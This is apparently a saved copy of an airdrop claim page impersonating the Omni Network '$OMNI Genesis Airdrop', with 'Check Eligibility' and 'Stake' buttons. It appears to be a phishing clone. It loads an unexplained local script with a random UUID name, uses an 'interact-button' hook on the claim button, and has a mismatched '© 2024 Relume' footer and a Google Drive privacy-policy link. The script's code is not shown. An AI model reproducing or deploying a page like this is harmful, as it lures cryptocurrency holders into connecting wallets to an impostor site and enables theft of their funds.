<!DOCTYPE html>
<html lang="en" style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(59,64,64); --wcm-color-overlay: rgba(255,255,255,0.1); --wcm-accent-color: #3F42ED; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 2000; --wcm-background-color: #3F42ED; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;">
<head>
    <link rel="icon" data-savepage-href="https://claims.omni.network/favicon.ico" href="https://claims.omni.network/favicon.ico">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../claims.omni.network/_next/static/css/b327e2118be25744.css" data-precedence="next">
    <link rel="stylesheet" href="../claims.omni.network/_next/static/css/b04d2f07e196d471.css" data-precedence="next">

    <title>Omni Network Genesis Airdrop</title>
    <meta name="description" content="Check eligibility for Omni Network’s Genesis airdrop, a program designed to reward the Omni community and its partners across the Ethereum ecosystem.">
    <meta name="keywords" content="Omni, airdrop, crypto, web3, interoperability, EigenLayer, restaking, blockchain, claim">
    <link rel="icon" data-savepage-href="https://claims.omni.network/favicon.ico" href="https://claims.omni.network/favicon.ico" type="image/x-icon" sizes="160x160">
   
    <style data-emotion="clique-global" data-s="" data-savepage-sheetrules="">html { -webkit-font-smoothing: antialiased; box-sizing: border-box; text-size-adjust: 100%; }
*, ::before, ::after { box-sizing: inherit; }
strong, b { font-weight: 700; }
body { margin: 0px; color: rgb(0, 0, 0); font-family: Inter, sans-serif; font-weight: 400; font-size: 1rem; line-height: 1.5; background-color: rgb(20, 36, 68); }
@media print {
  body { background-color: rgb(255, 255, 255); }
}
body::backdrop { background-color: rgb(20, 36, 68); }
</style>
    <style data-emotion="clique" data-s="" data-savepage-sheetrules="">.clique-1payom4 { display: flex; flex-direction: column; width: 100%; box-sizing: border-box; flex-shrink: 0; position: sticky; z-index: 1100; top: 0px; left: auto; right: 0px; color: rgb(255, 255, 255); background-color: rgb(20, 36, 68); }
.clique-7kmh0i { transition: box-shadow 300ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; background-image: unset; box-shadow: none; display: flex; flex-direction: column; width: 100%; box-sizing: border-box; flex-shrink: 0; position: sticky; z-index: 1100; top: 0px; left: auto; right: 0px; color: rgb(255, 255, 255); background-color: rgb(20, 36, 68); }
.clique-15rtkh3 { width: 100%; margin-left: auto; box-sizing: border-box; margin-right: auto; display: block; padding-left: 16px; padding-right: 16px; }
@media (min-width: 600px) {
  .clique-15rtkh3 { padding-left: 24px; padding-right: 24px; }
}
@media (min-width: 1536px) {
  .clique-15rtkh3 { max-width: 1536px; }
}
@media (min-width: 600px) {
  .clique-15rtkh3 { padding-left: 32px; padding-right: 32px; }
}
.clique-1yynk3j { position: relative; display: flex; -webkit-box-align: center; align-items: center; min-height: 56px; -webkit-box-pack: justify; justify-content: space-between; height: 80px; padding-left: 0px !important; padding-right: 0px !important; }
@media (min-width: 600px) {
  .clique-1yynk3j { padding-left: 24px; padding-right: 24px; }
}
@media (min-width: 0px) {
  @media (orientation: landscape) {
  .clique-1yynk3j { min-height: 48px; }
}
}
@media (min-width: 600px) {
  .clique-1yynk3j { min-height: 64px; }
}
.clique-783y6 { color: inherit; text-decoration: none; display: inline-block; }
.clique-1h9v6y7 { position: relative; width: 100px; height: 24px; overflow: hidden; }
.clique-xbw9uh { object-fit: contain; object-position: left center; }
.clique-vpjvvi { -webkit-box-flex: 1; flex-grow: 1; padding-left: 80px; padding-right: 16px; }
@media (min-width: 0px) {
  .clique-vpjvvi { display: none; }
}
@media (min-width: 900px) {
  .clique-vpjvvi { display: flex; }
}
.clique-9ehplr { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; -webkit-box-flex: 1; flex-grow: 1; padding-left: 80px; padding-right: 16px; }
.clique-9ehplr > :not(style):not(style) { margin: 0px; }
.clique-9ehplr > :not(style) ~ :not(style) { margin-left: 16px; }
@media (min-width: 0px) {
  .clique-9ehplr { display: none; }
}
@media (min-width: 900px) {
  .clique-9ehplr { display: flex; }
}
.clique-qx09eq { min-height: calc(-268px + 100vh); }
@media (min-width: 0px) {
  .clique-mjnr2a { padding-top: 64px; padding-bottom: 64px; }
}
@media (min-width: 900px) {
  .clique-mjnr2a { padding-top: 120px; padding-bottom: 120px; }
}
.clique-i6bazn { overflow: hidden; }
.clique-1csvno1 { --Grid-columns: 12; --Grid-columnSpacing: 64px; --Grid-rowSpacing: 64px; flex-flow: wrap; min-width: 0px; box-sizing: border-box; display: flex; margin: calc(var(--Grid-rowSpacing) / -2) calc(var(--Grid-columnSpacing) / -2); -webkit-box-align: center; align-items: center; }
.clique-1c6omog { -webkit-box-flex: 0; flex-grow: 0; flex-basis: auto; width: calc(100% * 12 / var(--Grid-columns)); min-width: 0px; box-sizing: border-box; padding: calc(var(--Grid-rowSpacing) / 2) calc(var(--Grid-columnSpacing) / 2); }
@media (min-width: 900px) {
  .clique-1c6omog { -webkit-box-flex: 0; flex-grow: 0; flex-basis: auto; width: calc(100% * 6 / var(--Grid-columns)); }
}
.clique-1hyoz7m { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; }
.clique-1w0676o { position: relative; width: 80%; overflow: hidden; aspect-ratio: 1 / 1; }
.clique-g98gbd { object-fit: contain; }
.clique-5sqouk { display: flex; flex-direction: column; }
@media (min-width: 0px) {
  .clique-5sqouk { gap: 16px; }
}
@media (min-width: 900px) {
  .clique-5sqouk { gap: 32px; }
}
.clique-11ellpz { margin: 0px; font-weight: 400; font-size: 1rem; line-height: 1.2; font-family: Manrope; color: rgb(255, 255, 255); }
@media (min-width: 0px) {
  .clique-11ellpz { font-size: 48px; }
}
@media (min-width: 900px) {
  .clique-11ellpz { font-size: 64px; }
}
@media (min-width: 1200px) {
  .clique-11ellpz { font-size: 80px; }
}
.clique-1d3ydsg { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; }
@media (min-width: 0px) {
  .clique-1d3ydsg { gap: 16px; }
}
@media (min-width: 900px) {
  .clique-1d3ydsg { gap: 24px; }
}
.clique-1cdhvdq { transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; border-radius: 32px; }
.clique-1cdhvdq .MuiLoadingButton-startIconLoadingStart, .clique-1cdhvdq .MuiLoadingButton-endIconLoadingEnd { transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; opacity: 0; }
.clique-1cdhvdq.MuiLoadingButton-loading { color: transparent; }
.clique-qld7fq { text-transform: capitalize; font-weight: 500; font-size: 1rem; font-family: Inter, sans-serif; line-height: 1.75; min-width: 64px; padding: 6px 16px; color: rgb(255, 255, 255); background-color: rgb(35, 105, 246); box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 1px -2px, rgba(0, 0, 0, 0.14) 0px 2px 2px 0px, rgba(0, 0, 0, 0.12) 0px 1px 5px 0px; transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; border-radius: 32px; }
.clique-qld7fq:hover { text-decoration: none; background-color: rgb(24, 73, 172); box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 4px -1px, rgba(0, 0, 0, 0.14) 0px 4px 5px 0px, rgba(0, 0, 0, 0.12) 0px 1px 10px 0px; }
@media (hover: none) {
  .clique-qld7fq:hover { background-color: rgb(35, 105, 246); }
}
.clique-qld7fq:active { box-shadow: rgba(0, 0, 0, 0.2) 0px 5px 5px -3px, rgba(0, 0, 0, 0.14) 0px 8px 10px 1px, rgba(0, 0, 0, 0.12) 0px 3px 14px 2px; }
.clique-qld7fq.Mui-focusVisible { box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 5px -1px, rgba(0, 0, 0, 0.14) 0px 6px 10px 0px, rgba(0, 0, 0, 0.12) 0px 1px 18px 0px; }
.clique-qld7fq.Mui-disabled { color: rgba(0, 0, 0, 0.26); box-shadow: none; background-color: rgba(0, 0, 0, 0.12); }
.clique-qld7fq .MuiLoadingButton-startIconLoadingStart, .clique-qld7fq .MuiLoadingButton-endIconLoadingEnd { transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; opacity: 0; }
.clique-qld7fq.MuiLoadingButton-loading { color: transparent; }
.clique-xi76o2 { display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; position: relative; box-sizing: border-box; -webkit-tap-highlight-color: transparent; outline: 0px; border: 0px; margin: 0px; cursor: pointer; user-select: none; vertical-align: middle; appearance: none; text-decoration: none; text-transform: capitalize; font-weight: 500; font-size: 1rem; font-family: Inter, sans-serif; line-height: 1.75; min-width: 64px; padding: 6px 16px; color: rgb(255, 255, 255); background-color: rgb(35, 105, 246); transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; border-radius: 32px; box-shadow: none !important; }
.clique-xi76o2.Mui-disabled { pointer-events: none; cursor: default; }
@media print {
  .clique-xi76o2 { -webkit-print-color-adjust: exact; }
}
.clique-xi76o2:hover { text-decoration: none; background-color: rgb(24, 73, 172); box-shadow: rgba(0, 0, 0, 0.2) 0px 2px 4px -1px, rgba(0, 0, 0, 0.14) 0px 4px 5px 0px, rgba(0, 0, 0, 0.12) 0px 1px 10px 0px; }
@media (hover: none) {
  .clique-xi76o2:hover { background-color: rgb(35, 105, 246); }
}
.clique-xi76o2:active { box-shadow: rgba(0, 0, 0, 0.2) 0px 5px 5px -3px, rgba(0, 0, 0, 0.14) 0px 8px 10px 1px, rgba(0, 0, 0, 0.12) 0px 3px 14px 2px; }
.clique-xi76o2.Mui-focusVisible { box-shadow: rgba(0, 0, 0, 0.2) 0px 3px 5px -1px, rgba(0, 0, 0, 0.14) 0px 6px 10px 0px, rgba(0, 0, 0, 0.12) 0px 1px 18px 0px; }
.clique-xi76o2.Mui-disabled { color: rgba(0, 0, 0, 0.26); box-shadow: none; background-color: rgba(0, 0, 0, 0.12); }
.clique-xi76o2 .MuiLoadingButton-startIconLoadingStart, .clique-xi76o2 .MuiLoadingButton-endIconLoadingEnd { transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; opacity: 0; }
.clique-xi76o2.MuiLoadingButton-loading { color: transparent; }
.clique-1dlg6w1 { color: rgb(255, 255, 255); }
@media (min-width: 0px) {
  .clique-1dlg6w1 { padding-top: 24px; }
}
@media (min-width: 900px) {
  .clique-1dlg6w1 { padding-top: 32px; }
}
.clique-9znm4z { display: flex; flex-direction: row; align-items: flex-end; gap: 8px; }
.clique-17emvf0 { margin: 0px; font-family: Inter, sans-serif; font-weight: 400; font-size: 1rem; line-height: 1.2; }
.clique-9owz4f { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; transform: translateY(1px); }
.clique-9owz4f > :not(style):not(style) { margin: 0px; }
.clique-9owz4f > :not(style) ~ :not(style) { margin-left: 8px; }
.clique-1smd1ay { position: relative; height: 20px; overflow: hidden; aspect-ratio: 3 / 1; }
.clique-1bw9l5g { display: flex; flex-direction: row; align-items: flex-start; padding-bottom: 40px; border-top: 1px solid rgba(255, 255, 255, 0.12); border-right-color: rgba(255, 255, 255, 0.12); border-bottom-color: rgba(255, 255, 255, 0.12); border-left-color: rgba(255, 255, 255, 0.12); -webkit-box-pack: justify; justify-content: space-between; gap: 8px; }
@media (min-width: 0px) {
  .clique-1bw9l5g { margin-top: 24px; padding-top: 24px; flex-direction: column-reverse; }
}
@media (min-width: 900px) {
  .clique-1bw9l5g { margin-top: 32px; padding-top: 32px; flex-direction: row; }
}
.clique-1kw9zgc { margin: 0px; font-family: Inter, sans-serif; font-weight: 400; font-size: 0.875rem; line-height: 1.2; }
.clique-1kprbnd { display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; gap: 8px 24px; }
.clique-1atbdya { color: inherit; text-decoration: underline; display: inline-block; }
@media print {
  .clique-1k371a6 { position: absolute !important; }
}
.clique-w0pj6f { overflow: hidden; pointer-events: none; position: absolute; z-index: 0; inset: 0px; border-radius: inherit; }
</style>
 
</head>

<script charset="UTF-8" type="text/javascript" src="./06d1d117-4814-41be-83a6-327f8ced6518.js"></script>

<body>
    <div class="Toastify"></div>
    <next-route-announcer style="position: absolute;"><template data-savepage-shadowroot="">
            <div aria-live="assertive" id="__next-route-announcer__" role="alert" style="position: absolute; border: 0px; height: 1px; margin: -1px; padding: 0px; width: 1px; clip: rect(0px, 0px, 0px, 0px); overflow: hidden; white-space: nowrap; overflow-wrap: normal;"></div>
        </template></next-route-announcer>
    <div class="_14der0i7o" style="visibility: visible;"></div>
    <header class="MuiPaper-root MuiPaper-elevation MuiPaper-elevation4 MuiAppBar-root MuiAppBar-colorPrimary MuiAppBar-positionSticky clique-7kmh0i">
        <div class="MuiContainer-root MuiContainer-maxWidthXl clique-15rtkh3">
            <div class="MuiToolbar-root MuiToolbar-gutters MuiToolbar-regular clique-1yynk3j"><a class="MuiBox-root clique-783y6" target="_blank" href="https://claims.omni.network">
                    <div class="MuiBox-root clique-1h9v6y7"><img alt="" decoding="async" data-nimg="fill" class="MuiBox-root clique-xbw9uh" sizes="100vw" data-savepage-srcset="/_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=640&q=75 640w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=750&q=75 750w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=828&q=75 828w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=1080&q=75 1080w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=1200&q=75 1200w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=1920&q=75 1920w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=2048&q=75 2048w, /_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=3840&q=75 3840w" srcset="" data-savepage-currentsrc="https://claims.omni.network/_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=3840&q=75" data-savepage-src="/_next/image?url=%2Fimages%2Fomni%2Flogo.png&w=3840&q=75" src="https://claims.omni.network/_next/image?url=%2Fimages%2Fomni%2Flogo.png&amp;w=3840&amp;q=75" style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;" data-savepage-loading="lazy"></div>
                </a>
                <div class="MuiStack-root MuiBox-root clique-9ehplr"></div>
            </div>
        </div>
    </header>
    <div class="MuiBox-root clique-qx09eq">
        <div class="MuiBox-root clique-0">
            <div class="MuiContainer-root MuiContainer-maxWidthXl clique-15rtkh3">
                <div class="MuiBox-root clique-mjnr2a">
                    <div class="MuiBox-root clique-i6bazn">
                        <div class="MuiGrid2-root MuiGrid2-container MuiGrid2-direction-xs-row MuiGrid2-spacing-xs-8 clique-1csvno1">
                            <div class="MuiGrid2-root MuiGrid2-direction-xs-row MuiGrid2-grid-xs-12 MuiGrid2-grid-md-6 clique-1c6omog">
                                <div class="MuiStack-root clique-1hyoz7m">
                                    <div class="MuiBox-root clique-1w0676o"><img alt="" decoding="async" data-nimg="fill" class="MuiBox-root clique-g98gbd" sizes="100vw" data-savepage-srcset="/_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=640&q=75 640w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=750&q=75 750w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=828&q=75 828w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=1080&q=75 1080w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=1200&q=75 1200w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=1920&q=75 1920w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=2048&q=75 2048w, /_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=3840&q=75 3840w" srcset="" data-savepage-currentsrc="https://claims.omni.network/_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=3840&q=75" data-savepage-src="/_next/image?url=%2Fimages%2Fhome%2Fmain.png&w=3840&q=75" src="https://claims.omni.network/_next/image?url=%2Fimages%2Fhome%2Fmain.png&amp;w=3840&amp;q=75" style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;" data-savepage-loading="lazy"></div>
                                </div>
                            </div>
                            <div class="MuiGrid2-root MuiGrid2-direction-xs-row MuiGrid2-grid-xs-12 MuiGrid2-grid-md-6 clique-1c6omog">
                                <div class="MuiStack-root clique-5sqouk">
                                    <div class="MuiBox-root clique-0">
                                        <p class="MuiTypography-root MuiTypography-body1 clique-11ellpz">Welcome to the $OMNI Genesis Airdrop</p>
                                    </div>
                                    <div class="MuiStack-root clique-1d3ydsg"> <button class="MuiButtonBase-root MuiButton-root MuiLoadingButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-colorPrimary MuiButton-root MuiLoadingButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-colorPrimary clique-xi76o2 interact-button" tabindex="0" type="button" id=":r3:">Check Eligibility<span class="MuiTouchRipple-root clique-w0pj6f"></span></button><button class="MuiButtonBase-root MuiButton-root MuiLoadingButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-colorPrimary MuiButton-root MuiLoadingButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-colorPrimary clique-xi76o2" tabindex="0" type="button" id=":r4:">Stake<span class="MuiTouchRipple-root clique-w0pj6f"></span></button></a></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="MuiBox-root clique-1dlg6w1">
        <div class="MuiContainer-root MuiContainer-maxWidthXl clique-15rtkh3"><a class="MuiBox-root clique-783y6" target="_blank" data-savepage-href="https://www.clique.tech" href="https://www.clique.tech/">
                <div class="MuiStack-root clique-9znm4z">
                    <p class="MuiTypography-root MuiTypography-body1 clique-17emvf0">Powered by</p><a class="MuiBox-root clique-783y6" data-savepage-href="/" href="https://claims.omni.network/">
                        <div class="MuiStack-root clique-9owz4f">
                            <div class="MuiBox-root clique-1smd1ay"><img alt="" decoding="async" data-nimg="fill" class="MuiBox-root clique-g98gbd" sizes="100vw" data-savepage-srcset="/_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=640&q=75 640w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=750&q=75 750w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=828&q=75 828w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=1080&q=75 1080w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=1200&q=75 1200w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=1920&q=75 1920w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=2048&q=75 2048w, /_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=3840&q=75 3840w" srcset="" data-savepage-currentsrc="https://claims.omni.network/_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=3840&q=75" data-savepage-src="/_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&w=3840&q=75" src="https://claims.omni.network/_next/image?url=%2Fimages%2Flogos%2Fclique-copy.png&amp;w=3840&amp;q=75" style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;" data-savepage-loading="lazy"></div>
                        </div>
                    </a>
                </div>
         
            <div class="MuiStack-root clique-1bw9l5g">
                <p class="MuiTypography-root MuiTypography-body2 clique-1kw9zgc">© 2024 Relume. All rights reserved.</p>
                <div class="MuiStack-root clique-1kprbnd"><a class="MuiBox-root clique-1atbdya" target="_blank" data-savepage-href="https://drive.google.com/file/d/1-zL69dMPM3FVCjzygMuu4hKpzGgirtec/edit " href="https://drive.google.com/file/d/1-zL69dMPM3FVCjzygMuu4hKpzGgirtec/edit">
                        <p class="MuiTypography-root MuiTypography-body2 clique-1kw9zgc">Privacy Policy</p>
                    </a></div>
            </div>
        </div>
    </div>
  
</body>
</html>